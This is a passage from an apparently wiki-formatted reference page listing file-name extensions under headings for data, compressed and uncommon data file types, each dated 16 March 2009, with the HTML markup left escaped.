.ftm&lt;br /&gt;
.ftw&lt;br /&gt;
.gan&lt;br /&gt;
.gbr&lt;br /&gt;
.gc&lt;br /&gt;
.gcx&lt;br /&gt;
.gdb&lt;br /&gt;
.ged&lt;br /&gt;
.gedcom&lt;br /&gt;
.gen&lt;br /&gt;
.ggb&lt;br /&gt;
.gml&lt;br /&gt;
.gms&lt;br /&gt;
.gno&lt;br /&gt;
.gnp&lt;br /&gt;
.gp3&lt;br /&gt;
.gpi&lt;br /&gt;
.gps&lt;br /&gt;
.gpx&lt;br /&gt;
.gra&lt;br /&gt;
.grade&lt;br /&gt;
.grf&lt;br /&gt;
.grib&lt;br /&gt;
.grk&lt;br /&gt;
.grr&lt;br /&gt;
.grv&lt;br /&gt;
.gs&lt;br /&gt;
.gst&lt;br /&gt;
.gtp&lt;br /&gt;
.gwk&lt;br /&gt;
.gxl&lt;br /&gt;
.hcc&lt;br /&gt;
.hce&lt;br /&gt;
.hci&lt;br /&gt;
.hcp&lt;br /&gt;
.hcr&lt;br /&gt;
.hcu&lt;br /&gt;
.hda&lt;br /&gt;
.hdb&lt;br /&gt;
.hdf&lt;br /&gt;
.hdi&lt;br /&gt;
.hdl&lt;br /&gt;
.hif&lt;br /&gt;
.hl&lt;br /&gt;
.hml&lt;br /&gt;
.hmt&lt;br /&gt;
.hs2&lt;br /&gt;
.hsk&lt;br /&gt;
.hst&lt;br /&gt;
.htg&lt;br /&gt;
.huh&lt;br /&gt;
.hyv&lt;br /&gt;
.i5z&lt;br /&gt;
.ib&lt;br /&gt;
.ics&lt;br /&gt;
.id2&lt;br /&gt;
.idx&lt;br /&gt;
.igc&lt;br /&gt;
.ihx&lt;br /&gt;
.ii&lt;br /&gt;
.iif&lt;br /&gt;
.img&lt;br /&gt;
.imt&lt;br /&gt;
.ink&lt;br /&gt;
.inp&lt;br /&gt;
.ins&lt;br /&gt;
.ip&lt;br /&gt;
.irock&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.isf&lt;br /&gt;
.itdb&lt;br /&gt;
.itl&lt;br /&gt;
.itm&lt;br /&gt;
.itn&lt;br /&gt;
.itw&lt;br /&gt;
.itx&lt;br /&gt;
.ivt&lt;br /&gt;
.iw&lt;br /&gt;
.ixb&lt;br /&gt;
.jasper&lt;br /&gt;
.jdb&lt;br /&gt;
.jef&lt;br /&gt;
.jmp&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.joboptions&lt;br /&gt;
.joined&lt;br /&gt;
.jph&lt;br /&gt;
.jrprint&lt;br /&gt;
.jrxml&lt;br /&gt;
.jude&lt;br /&gt;
.kap&lt;br /&gt;
.kdb&lt;br /&gt;
.kid&lt;br /&gt;
.kismac&lt;br /&gt;
.kmz&lt;br /&gt;
.kpf&lt;br /&gt;
.kpp&lt;br /&gt;
.kpr&lt;br /&gt;
.kpx&lt;br /&gt;
.kpz&lt;br /&gt;
.l&lt;br /&gt;
.l6t&lt;br /&gt;
.laccdb&lt;br /&gt;
.lbl&lt;br /&gt;
.lbx&lt;br /&gt;
.lcd&lt;br /&gt;
.lcf&lt;br /&gt;
.lcm&lt;br /&gt;
.ldif&lt;br /&gt;
.lex&lt;br /&gt;
.lgc&lt;br /&gt;
.lgf&lt;br /&gt;
.lgh&lt;br /&gt;
.lgi&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.lif&lt;br /&gt;
.livereg&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lix&lt;br /&gt;
.llb&lt;br /&gt;
.lms&lt;br /&gt;
.lmx&lt;br /&gt;
.lnt&lt;br /&gt;
.loc&lt;br /&gt;
.lp7&lt;br /&gt;
.lrf&lt;br /&gt;
.lrs&lt;br /&gt;
.lrx&lt;br /&gt;
.lsf&lt;br /&gt;
.lsl&lt;br /&gt;
.lsp&lt;br /&gt;
.lsr&lt;br /&gt;
.lst&lt;br /&gt;
.lsu&lt;br /&gt;
.lvm&lt;br /&gt;
.lw4&lt;br /&gt;
.ly&lt;br /&gt;
.m&lt;br /&gt;
.mag&lt;br /&gt;
.mai&lt;br /&gt;
.map&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mbf&lt;br /&gt;
.mbg&lt;br /&gt;
.mbl&lt;br /&gt;
.mbp&lt;br /&gt;
.mbx&lt;br /&gt;
.mc1&lt;br /&gt;
.mc9&lt;br /&gt;
.mcd&lt;br /&gt;
.md&lt;br /&gt;
.mdb&lt;br /&gt;
.mdc&lt;br /&gt;
.mdf&lt;br /&gt;
.mdl&lt;br /&gt;
.mdm&lt;br /&gt;
.mdn&lt;br /&gt;
.mdt&lt;br /&gt;
.mdx&lt;br /&gt;
.mdz&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mex&lt;br /&gt;
.mfo&lt;br /&gt;
.mfp&lt;br /&gt;
.mgc&lt;br /&gt;
.mls&lt;br /&gt;
.mm&lt;br /&gt;
.mmap&lt;br /&gt;
.mmc&lt;br /&gt;
.mmf&lt;br /&gt;
.mmp&lt;br /&gt;
.mnc&lt;br /&gt;
.mng&lt;br /&gt;
.mnk&lt;br /&gt;
.mno&lt;br /&gt;
.mny&lt;br /&gt;
.mobi&lt;br /&gt;
.moho&lt;br /&gt;
.mosaic&lt;br /&gt;
.mox&lt;br /&gt;
.mpd&lt;br /&gt;
.mpj&lt;br /&gt;
.mpp&lt;br /&gt;
.mpt&lt;br /&gt;
.mpx&lt;br /&gt;
.mpz&lt;br /&gt;
.mq4&lt;br /&gt;
.ms10&lt;br /&gt;
.mth&lt;br /&gt;
.mtw&lt;br /&gt;
.mud&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mws&lt;br /&gt;
.mwx&lt;br /&gt;
.mxd&lt;br /&gt;
.myd&lt;br /&gt;
.myi&lt;br /&gt;
.nb&lt;br /&gt;
.nc&lt;br /&gt;
.ndf&lt;br /&gt;
.ndk&lt;br /&gt;
.ndx&lt;br /&gt;
.net&lt;br /&gt;
.neta&lt;br /&gt;
.nfo&lt;br /&gt;
.nitf&lt;br /&gt;
.nmind&lt;br /&gt;
.not&lt;br /&gt;
.notebook&lt;br /&gt;
.np&lt;br /&gt;
.npl&lt;br /&gt;
.npt&lt;br /&gt;
.nrl&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.nsf&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.nvl&lt;br /&gt;
.nyf&lt;br /&gt;
.oab&lt;br /&gt;
.obj&lt;br /&gt;
.odb&lt;br /&gt;
.odf&lt;br /&gt;
.odp&lt;br /&gt;
.ods&lt;br /&gt;
.odx&lt;br /&gt;
.oeaccount&lt;br /&gt;
.ofc&lt;br /&gt;
.ofm&lt;br /&gt;
.oft&lt;br /&gt;
.ofx&lt;br /&gt;
.omcs&lt;br /&gt;
.omp&lt;br /&gt;
.ond&lt;br /&gt;
.one&lt;br /&gt;
.oo3&lt;br /&gt;
.opf&lt;br /&gt;
.opx&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.or6&lt;br /&gt;
.org&lt;br /&gt;
.orx&lt;br /&gt;
.otf&lt;br /&gt;
.otl&lt;br /&gt;
.otln&lt;br /&gt;
.ots&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ova&lt;br /&gt;
.ovf&lt;br /&gt;
.p96&lt;br /&gt;
.p97&lt;br /&gt;
.pab&lt;br /&gt;
.paf&lt;br /&gt;
.pan&lt;br /&gt;
.pbd&lt;br /&gt;
.pc&lt;br /&gt;
.pcap&lt;br /&gt;
.pcb&lt;br /&gt;
.pcr&lt;br /&gt;
.pd4&lt;br /&gt;
.pd5&lt;br /&gt;
.pdas&lt;br /&gt;
.pdb&lt;br /&gt;
.pdd&lt;br /&gt;
.pdm&lt;br /&gt;
.pds&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pep&lt;br /&gt;
.pex&lt;br /&gt;
.pfc&lt;br /&gt;
.pfl&lt;br /&gt;
.phb&lt;br /&gt;
.phm&lt;br /&gt;
.pi&lt;br /&gt;
.pis&lt;br /&gt;
.pjx&lt;br /&gt;
.pka&lt;br /&gt;
.pkb&lt;br /&gt;
.pkh&lt;br /&gt;
.pks&lt;br /&gt;
.pkt&lt;br /&gt;
.pln&lt;br /&gt;
.plw&lt;br /&gt;
.pmo&lt;br /&gt;
.pmr&lt;br /&gt;
.pnproj&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pod&lt;br /&gt;
.poi&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pot&lt;br /&gt;
.potm&lt;br /&gt;
.potx&lt;br /&gt;
.pp2&lt;br /&gt;
.ppf&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.prc&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.prj&lt;br /&gt;
.prm&lt;br /&gt;
.prs&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.psm&lt;br /&gt;
.pst&lt;br /&gt;
.ptb&lt;br /&gt;
.ptf&lt;br /&gt;
.ptk&lt;br /&gt;
.ptm&lt;br /&gt;
.ptn&lt;br /&gt;
.ptt&lt;br /&gt;
.ptz&lt;br /&gt;
.pvl&lt;br /&gt;
.pwd&lt;br /&gt;
.pxj&lt;br /&gt;
.pxl&lt;br /&gt;
.q07&lt;br /&gt;
.q08&lt;br /&gt;
.q09&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qdfm&lt;br /&gt;
.qel&lt;br /&gt;
.qfx&lt;br /&gt;
.qif&lt;br /&gt;
.qpb&lt;br /&gt;
.qpf&lt;br /&gt;
.qph&lt;br /&gt;
.qpm&lt;br /&gt;
.qpw&lt;br /&gt;
.qrp&lt;br /&gt;
.qsd&lt;br /&gt;
.ral&lt;br /&gt;
.rbt&lt;br /&gt;
.rcd&lt;br /&gt;
.rcg&lt;br /&gt;
.rdb&lt;br /&gt;
.rdf&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.ret&lt;br /&gt;
.rf1&lt;br /&gt;
.rfa&lt;br /&gt;
.rfo&lt;br /&gt;
.rge&lt;br /&gt;
.rgn&lt;br /&gt;
.rgo&lt;br /&gt;
.rmuf&lt;br /&gt;
.rnq&lt;br /&gt;
.rod&lt;br /&gt;
.rog&lt;br /&gt;
.roi&lt;br /&gt;
.rou&lt;br /&gt;
.rpp&lt;br /&gt;
.rpt&lt;br /&gt;
.rrt&lt;br /&gt;
.rsc&lt;br /&gt;
.rsd&lt;br /&gt;
.rsw&lt;br /&gt;
.rte&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.rzb&lt;br /&gt;
.s85&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sar&lt;br /&gt;
.sav&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sca&lt;br /&gt;
.scf&lt;br /&gt;
.sch&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sdp&lt;br /&gt;
.sdq&lt;br /&gt;
.sds&lt;br /&gt;
.sen&lt;br /&gt;
.seo&lt;br /&gt;
.seq&lt;br /&gt;
.ser&lt;br /&gt;
.sgml&lt;br /&gt;
.sgn&lt;br /&gt;
.shp&lt;br /&gt;
.shs&lt;br /&gt;
.shx&lt;br /&gt;
.skc&lt;br /&gt;
.skv&lt;br /&gt;
.skx&lt;br /&gt;
.sle&lt;br /&gt;
.slk&lt;br /&gt;
.slp&lt;br /&gt;
.snapfireshow&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sps&lt;br /&gt;
.spub&lt;br /&gt;
.spv&lt;br /&gt;
.sq&lt;br /&gt;
.sqd&lt;br /&gt;
.sql&lt;br /&gt;
.sqlite&lt;br /&gt;
.sqr&lt;br /&gt;
.sta&lt;br /&gt;
.stc&lt;br /&gt;
.stf&lt;br /&gt;
.stk&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.stp&lt;br /&gt;
.str&lt;br /&gt;
.stt&lt;br /&gt;
.stw&lt;br /&gt;
.styk&lt;br /&gt;
.stykz&lt;br /&gt;
.swk&lt;br /&gt;
.sxc&lt;br /&gt;
.sxi&lt;br /&gt;
.sy3&lt;br /&gt;
.t01&lt;br /&gt;
.t02&lt;br /&gt;
.t03&lt;br /&gt;
.t04&lt;br /&gt;
.t05&lt;br /&gt;
.t06&lt;br /&gt;
.t07&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.t3001&lt;br /&gt;
.tax2008&lt;br /&gt;
.tax2009&lt;br /&gt;
.tb&lt;br /&gt;
.tbk&lt;br /&gt;
.tbl&lt;br /&gt;
.tcc&lt;br /&gt;
.tcx&lt;br /&gt;
.tda&lt;br /&gt;
.tdl&lt;br /&gt;
.tdm&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.te3&lt;br /&gt;
.teacher&lt;br /&gt;
.tef&lt;br /&gt;
.tet&lt;br /&gt;
.tfa&lt;br /&gt;
.tfd&lt;br /&gt;
.tfrd&lt;br /&gt;
.tjp&lt;br /&gt;
.tk3&lt;br /&gt;
.tkfl&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.topc&lt;br /&gt;
.tpb&lt;br /&gt;
.tps&lt;br /&gt;
.tr3&lt;br /&gt;
.tra&lt;br /&gt;
.trd&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tst&lt;br /&gt;
.tsv&lt;br /&gt;
.ttk&lt;br /&gt;
.txa&lt;br /&gt;
.txd&lt;br /&gt;
.txf&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udb&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.ulf&lt;br /&gt;
.ulz&lt;br /&gt;
.update&lt;br /&gt;
.upoi&lt;br /&gt;
.usr&lt;br /&gt;
.uvf&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vbpf1&lt;br /&gt;
.vcd&lt;br /&gt;
.vce&lt;br /&gt;
.vcf&lt;br /&gt;
.vcs&lt;br /&gt;
.vdb&lt;br /&gt;
.vdx&lt;br /&gt;
.vfs&lt;br /&gt;
.vi&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vmt&lt;br /&gt;
.voi&lt;br /&gt;
.vok&lt;br /&gt;
.vrd&lt;br /&gt;
.vscontent&lt;br /&gt;
.vsx&lt;br /&gt;
.vtx&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb2&lt;br /&gt;
.wb3&lt;br /&gt;
.wdb&lt;br /&gt;
.wdq&lt;br /&gt;
.wea&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.wgp&lt;br /&gt;
.wgt&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wjr&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wki&lt;br /&gt;
.wks&lt;br /&gt;
.wku&lt;br /&gt;
.wlmp&lt;br /&gt;
.wmdb&lt;br /&gt;
.wor&lt;br /&gt;
.wpc&lt;br /&gt;
.wpf&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtb&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xdp&lt;br /&gt;
.xds&lt;br /&gt;
.xef&lt;br /&gt;
.xem&lt;br /&gt;
.xfd&lt;br /&gt;
.xfo&lt;br /&gt;
.xft&lt;br /&gt;
.xl&lt;br /&gt;
.xlc&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsb&lt;br /&gt;
.xlsm&lt;br /&gt;
.xlsx&lt;br /&gt;
.xlt&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xlw&lt;br /&gt;
.xmcd&lt;br /&gt;
.xml&lt;br /&gt;
.xmlper&lt;br /&gt;
.xmpz&lt;br /&gt;
.xpg&lt;br /&gt;
.xpj&lt;br /&gt;
.xpm&lt;br /&gt;
.xpt&lt;br /&gt;
.xrp&lt;br /&gt;
.xsl&lt;br /&gt;
.xslt&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.yam&lt;br /&gt;
.zap&lt;br /&gt;
.zdb&lt;br /&gt;
.zdc&lt;br /&gt;
.zix&lt;br /&gt;
.zmc&lt;br /&gt;
.zpl&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== (Compressed File Types - (Update: 16 March 2009 - Total Statements: 187) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;.0&lt;br /&gt;
.000&lt;br /&gt;
.7z&lt;br /&gt;
.a00&lt;br /&gt;
.a01&lt;br /&gt;
.a02&lt;br /&gt;
.ace&lt;br /&gt;
.ain&lt;br /&gt;
.alz&lt;br /&gt;
.apz&lt;br /&gt;
.ar&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ari&lt;br /&gt;
.arj&lt;br /&gt;
.ark&lt;br /&gt;
.axx&lt;br /&gt;
.b64&lt;br /&gt;
.ba&lt;br /&gt;
.bh&lt;br /&gt;
.boo&lt;br /&gt;
.bz&lt;br /&gt;
.bz2&lt;br /&gt;
.bzip&lt;br /&gt;
.bzip2&lt;br /&gt;
.c00&lt;br /&gt;
.c01&lt;br /&gt;
.c02&lt;br /&gt;
.car&lt;br /&gt;
.cb7&lt;br /&gt;
.cbr&lt;br /&gt;
.cbt&lt;br /&gt;
.cbz&lt;br /&gt;
.cp9&lt;br /&gt;
.cpgz&lt;br /&gt;
.cpt&lt;br /&gt;
.dar&lt;br /&gt;
.dd&lt;br /&gt;
.deb&lt;br /&gt;
.dgc&lt;br /&gt;
.dist&lt;br /&gt;
.ecs&lt;br /&gt;
.efw&lt;br /&gt;
.epi&lt;br /&gt;
.f&lt;br /&gt;
.fdp&lt;br /&gt;
.gca&lt;br /&gt;
.gz&lt;br /&gt;
.gzi&lt;br /&gt;
.gzip&lt;br /&gt;
.ha&lt;br /&gt;
.hbc&lt;br /&gt;
.hbc2&lt;br /&gt;
.hbe&lt;br /&gt;
.hki&lt;br /&gt;
.hki1&lt;br /&gt;
.hki2&lt;br /&gt;
.hki3&lt;br /&gt;
.hpk&lt;br /&gt;
.hyp&lt;br /&gt;
.ice&lt;br /&gt;
.ipg&lt;br /&gt;
.ipk&lt;br /&gt;
.ish&lt;br /&gt;
.j&lt;br /&gt;
.jar.pack&lt;br /&gt;
.jgz&lt;br /&gt;
.jic&lt;br /&gt;
.kgb&lt;br /&gt;
.lbr&lt;br /&gt;
.lemon&lt;br /&gt;
.lha&lt;br /&gt;
.lnx&lt;br /&gt;
.lqr&lt;br /&gt;
.lz&lt;br /&gt;
.lzh&lt;br /&gt;
.lzm&lt;br /&gt;
.lzma&lt;br /&gt;
.lzo&lt;br /&gt;
.lzx&lt;br /&gt;
.md&lt;br /&gt;
.mint&lt;br /&gt;
.mou&lt;br /&gt;
.mpkg&lt;br /&gt;
.mzp&lt;br /&gt;
.oar&lt;br /&gt;
.p7m&lt;br /&gt;
.pack.gz&lt;br /&gt;
.package&lt;br /&gt;
.pae&lt;br /&gt;
.pak&lt;br /&gt;
.paq6&lt;br /&gt;
.paq7&lt;br /&gt;
.paq8&lt;br /&gt;
.par&lt;br /&gt;
.par2&lt;br /&gt;
.pbi&lt;br /&gt;
.pcv&lt;br /&gt;
.pea&lt;br /&gt;
.pet&lt;br /&gt;
.pf&lt;br /&gt;
.pim&lt;br /&gt;
.pit&lt;br /&gt;
.piz&lt;br /&gt;
.pkg&lt;br /&gt;
.pup&lt;br /&gt;
.puz&lt;br /&gt;
.pwa&lt;br /&gt;
.qda&lt;br /&gt;
.r0&lt;br /&gt;
.r00&lt;br /&gt;
.r01&lt;br /&gt;
.r02&lt;br /&gt;
.r03&lt;br /&gt;
.r1&lt;br /&gt;
.r2&lt;br /&gt;
.r30&lt;br /&gt;
.rar&lt;br /&gt;
.rev&lt;br /&gt;
.rk&lt;br /&gt;
.rnc&lt;br /&gt;
.rp9&lt;br /&gt;
.rpm&lt;br /&gt;
.rte&lt;br /&gt;
.rz&lt;br /&gt;
.rzs&lt;br /&gt;
.s00&lt;br /&gt;
.s01&lt;br /&gt;
.s02&lt;br /&gt;
.s7z&lt;br /&gt;
.sar&lt;br /&gt;
.sdc&lt;br /&gt;
.sdn&lt;br /&gt;
.sea&lt;br /&gt;
.sen&lt;br /&gt;
.sfs&lt;br /&gt;
.sfx&lt;br /&gt;
.sh&lt;br /&gt;
.shar&lt;br /&gt;
.shk&lt;br /&gt;
.shr&lt;br /&gt;
.sit&lt;br /&gt;
.sitx&lt;br /&gt;
.spt&lt;br /&gt;
.sqx&lt;br /&gt;
.sqz&lt;br /&gt;
.tar&lt;br /&gt;
.tar.gz&lt;br /&gt;
.tar.xz&lt;br /&gt;
.taz&lt;br /&gt;
.tbz&lt;br /&gt;
.tbz2&lt;br /&gt;
.tg&lt;br /&gt;
.tgz&lt;br /&gt;
.tlz&lt;br /&gt;
.tlzma&lt;br /&gt;
.txz&lt;br /&gt;
.tz&lt;br /&gt;
.uc2&lt;br /&gt;
.uha&lt;br /&gt;
.vem&lt;br /&gt;
.vsi&lt;br /&gt;
.wad&lt;br /&gt;
.war&lt;br /&gt;
.wot&lt;br /&gt;
.xef&lt;br /&gt;
.xez&lt;br /&gt;
.xmcdz&lt;br /&gt;
.xpi&lt;br /&gt;
.xx&lt;br /&gt;
.xz&lt;br /&gt;
.y&lt;br /&gt;
.yz&lt;br /&gt;
.z&lt;br /&gt;
.z01&lt;br /&gt;
.z02&lt;br /&gt;
.z03&lt;br /&gt;
.z04&lt;br /&gt;
.zap&lt;br /&gt;
.zfsendtotarget&lt;br /&gt;
.zip&lt;br /&gt;
.zipx&lt;br /&gt;
.zix&lt;br /&gt;
.zoo&lt;br /&gt;
.zpi&lt;br /&gt;
.zz&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== (Uncommon Data File Extensions  (Update: 16 March 2009 - Total Statements: 284) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.aao&lt;br /&gt;
.ab2&lt;br /&gt;
.aca&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.agd&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ast&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.bafl&lt;br /&gt;
.bdf&lt;br /&gt;
.bfx&lt;br /&gt;
.bjo&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.chk&lt;br /&gt;
.ckd&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.cmbl&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.csv&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.daf&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.dcf&lt;br /&gt;
.ddt&lt;br /&gt;
.dex&lt;br /&gt;
.dif&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dpx&lt;br /&gt;
.dsd&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.e00&lt;br /&gt;
.ec0&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epw&lt;br /&gt;
.est&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.ev3&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.fbl&lt;br /&gt;
.fdb&lt;br /&gt;
.fid&lt;br /&gt;
.fol&lt;br /&gt;
.gdb&lt;br /&gt;
.gen&lt;br /&gt;
.gnp&lt;br /&gt;
.gpi&lt;br /&gt;
.gpx&lt;br /&gt;
.hcp&lt;br /&gt;
.hdf&lt;br /&gt;
.hmt&lt;br /&gt;
.hsk&lt;br /&gt;
.htg&lt;br /&gt;
.id2&lt;br /&gt;
.ii&lt;br /&gt;
.img&lt;br /&gt;
.ink&lt;br /&gt;
.ins&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.iw&lt;br /&gt;
.jdb&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.jrprint&lt;br /&gt;
.kmz&lt;br /&gt;
.lbx&lt;br /&gt;
.lex&lt;br /&gt;
.lgf&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lnt&lt;br /&gt;
.lst&lt;br /&gt;
.m&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mdb&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mmf&lt;br /&gt;
.mng&lt;br /&gt;
.mpd&lt;br /&gt;
.mpp&lt;br /&gt;
.ms10&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mwx&lt;br /&gt;
.nc&lt;br /&gt;
.ndx&lt;br /&gt;
.nfo&lt;br /&gt;
.not&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.ods&lt;br /&gt;
.oeaccount&lt;br /&gt;
.omcs&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.orx&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ovf&lt;br /&gt;
.paf&lt;br /&gt;
.pbd&lt;br /&gt;
.pcr&lt;br /&gt;
.pdb&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pfc&lt;br /&gt;
.pis&lt;br /&gt;
.pln&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.pst&lt;br /&gt;
.ptz&lt;br /&gt;
.q07&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qfx&lt;br /&gt;
.qpf&lt;br /&gt;
.qpw&lt;br /&gt;
.qsd&lt;br /&gt;
.rcd&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.rmuf&lt;br /&gt;
.roi&lt;br /&gt;
.rrt&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sds&lt;br /&gt;
.ser&lt;br /&gt;
.sgn&lt;br /&gt;
.shs&lt;br /&gt;
.skc&lt;br /&gt;
.slk&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sql&lt;br /&gt;
.stf&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.sy3&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
